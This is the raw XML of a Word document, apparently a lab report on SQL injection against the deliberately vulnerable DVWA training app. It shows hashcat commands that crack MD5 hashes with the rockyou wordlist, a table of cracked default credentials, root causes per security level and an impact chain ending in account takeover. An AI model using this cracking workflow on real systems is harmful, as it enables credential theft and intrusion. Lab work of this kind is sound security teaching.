          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 0 hashes.txt --show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E0401" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Command used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C7D6C" w14:textId="77777777" w:rsidR="00CF4032"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rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 0 -a 0 hashes.txt /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt --username --show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B450A8" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00981708" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981708">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cracked results</w:t>
      </w:r>
      <w:r w:rsidRPr="00981708">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00"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF4032" w14:paraId="4C36BE82" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="6B870E40" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="373AA98F" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="6087939C" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Cracked Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="12EF7374" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B375E36" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4626276A" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40C2F9A1" w14:textId="55A630CF" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00981708">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="4CA74392" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="072CD414" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>gordonb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DD0B9D0" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>e99a18c428cb38d5f260853678922e03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B754365" w14:textId="79BAED8B" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00981708">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>abc123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="78B80721" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D815A0" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C26FF2" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="094D6212" w14:textId="4E9C51C1" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00981708">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>charley</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="7D0443E8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46F67ED7" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>pablo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796CCFB3" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E68FECF" w14:textId="796A42ED" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00981708">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>letmein</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="794501AB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27AE0D06" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>smithy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B366ED4" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52469813" w14:textId="16A08F4C" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00981708">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="675DE51F" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Notable observation: admin and smithy share an identical hash, indicating password reuse between accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182BB499" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>6. Root Cause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900"/>
        <w:gridCol w:w="600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF4032" w14:paraId="7DCC0410" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="5FBC1F5B" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="4F0BD4BA" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="13ECC847" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00CF4032"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w:rsidRPr="009556A1" w14:paraId="6F77246D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16C4C377" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="158B6434" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No input sanitization or parameterization — raw input concatenated directly into SQL query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F8FECAB" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00CF4032">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w:rsidRPr="009556A1" w14:paraId="52187A30" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48BD4E4D" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2171BE9C" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Basic escaping applied (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mysqli_real_escape_string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>), but query structure still vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23AA29F6" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00CF4032">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w:rsidRPr="009556A1" w14:paraId="65273797" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="101469A5" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A25891F" w14:textId="151754E3" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00B357AD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Bypassing the security is not possible (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>acc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D0A7495" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00CF4032">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C8C964A" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Underlying issue across all levels: Use of dynamic string concatenation to build SQL queries instead of parameterized queries / prepared statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286E6715" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>7. Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E754E12" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Full disclosure of the application's user table (usernames + password hashes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540E047" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weak, unsalted MD5 hashing allowed rapid offline cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78935318" w14:textId="1D9729A2" w:rsidR="00CF4032" w:rsidRPr="00981708" w:rsidRDefault="00000000" w:rsidP="00981708">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Potential account takeover (admin access) via credential reuse</w:t>
      </w:r>
      <w:r w:rsidR="00981708">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00981708">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chain demonstrates: Injection → Data Exfiltration → Credential Compromise → Account Takeover</w:t>
      </w:r>
      <w:r w:rsidR="00981708">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E76E285" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD09B7" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP: SQL Injection — A03:2021 Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CAA5FE" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344EEC6C" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>DVWA official documentation</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CF40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908CC" w14:textId="77777777" w:rsidR="00BC2EEE" w:rsidRDefault="00BC2EEE" w:rsidP="009556A1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0DA5C54C" w14:textId="77777777" w:rsidR="00BC2EEE" w:rsidRDefault="00BC2EEE" w:rsidP="00955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67C6" w14:textId="77777777" w:rsidR="00BC2EEE" w:rsidRDefault="00BC2EEE" w:rsidP="009556A1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5C5C4F33" w14:textId="77777777" w:rsidR="00BC2EEE" w:rsidRDefault="00BC2EEE" w:rsidP="00955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3EEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97D66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6B265D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA02C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435F04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3594C460"/>
    <w:lvl w:ilvl="0" w:tplc="3E3CD6BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="73A297B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="388CA82E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
